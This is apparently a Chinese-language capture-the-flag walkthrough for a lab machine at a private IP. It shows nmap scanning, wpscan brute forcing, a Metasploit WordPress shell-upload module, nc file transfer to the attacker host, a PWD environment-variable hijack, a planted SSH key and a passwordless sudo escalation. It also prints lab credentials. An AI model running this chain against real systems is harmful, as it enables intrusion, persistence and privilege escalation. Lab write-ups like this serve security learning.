首先 nmap 扫描端口
nmap -p- -A 192.168.149.179
有个 ftp 可以匿名登录
下下来看一下
去扫一下
http://192.168.149.179:65535/
扫出来一个 phpcms
这里有个验证密码才能看的,用之前 ftp 保存下来的密码试一下
wpscan --url http://192.168.149.179:65535/phpcms/ --enumerate
收集一下用户名
wpscan --url http://192.168.149.179:65535/phpcms/ -U user.txt -P pass.txt
爆破一下账号密码
Username: maybeadmin
Password: $EPid%J2L9LufO5
然后登录后台看一下,可以找到另一组账号密码
notadmin:Pa$$w0rd13!&
然后用 msf 连接一下
exploit/unix/webapp/wp_admin_shell_upload
设置以下参数
notadmin
Pa$$w0rd13!&
192.168.149.179
65535
/phpcms
代码语言:javascript复制python3 -c 'import pty; pty.spawn("/bin/bash")'
在 /home/doe目录下有一个 itseasy 文件,执行会返回当前路径
wsl:nc -lvp 10001 >itseasy
靶机:nc 192.168.149.1 10001 <itseasy
把这个文件给弄出来,IDA 打开看一下
C 库函数 char *getenv(const char *name) 搜索 name 所指向的环境字符串,并返回相关的值给字符串,在这里就是 PWD 所指向的,我们可以改一下,从而获得一个 shell
实际上是请求了 PWD(一个 web 靶机,用上了 IDA 我是没想到的)
代码语言:javascript复制export PWD=$(/bin/bash)
然后再执行那个文件就能拿到 john 用户的 shell
现在有个问题是 ls,cat 之类的是不回显的,所以考虑一下把 ssh 的 authorized_keys 写成 wsl 的公钥,用 ssh 登上去(john 用户还没有 .ssh 文件夹,新建一个)
代码语言:javascript复制echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyab46KTnUD6PBqNHweAB SfDl36waT1RpkBUB3rcmP7QhRk4EOh0yShEmGCA2fev/A/9BY2LP2nd4EplGNYn14OgHONtXH74fSCqf0QZGMexQ9BkV5pHOTW nGapxeaUTzyEkQQvDLnLm05Oqx6F9d5pfHIrbfQLBK7J0zY1BpkflT3I8pBzEdzLCWoG4Z62WGKQ0Q0ldm9NkRoEbZSOUxneazHiVa89mORtdtHXRr3nseLOyN17rJh6c2CF8ZtlLHIp12GOl0A6qm0eFW4KSJJvZCdxhX/p83hfCclFw7dckX1n Q45GjuUF/ZE8IXmKRkwNDxOZalSgFjyYX RlMr95Ruv8IaMk8tv5 Ut04cquKUgCn/9ksLRyL7 fJFok1EEupo4ZjTx3DlBNdkSch3IPT1XVgZeapqUik7jt5DgeGmGKBF93kE9pLO 2 3l1KntdeZ3abJHXDWzX6/mqRNtvMzdVik0jQGOjnGz1Yck0z9w8BK8BGtZ 917Kvns= 1097179511@qq.com" > authorized_keys
登录成功,舒服了
另外他还藏了个密码,base64解码之后是:john:YZW$s8Y49IB#ZZJ
这时候 sudo -l 可以发现有个文件是可以不需要密码就能 sudo运行的
文件夹只有 www-data 账户可以写入,所以还是要回到 www-data 的 shell,写个 /bin/sh,然后 sudo 一执行就能拿到 root 权限的 shell
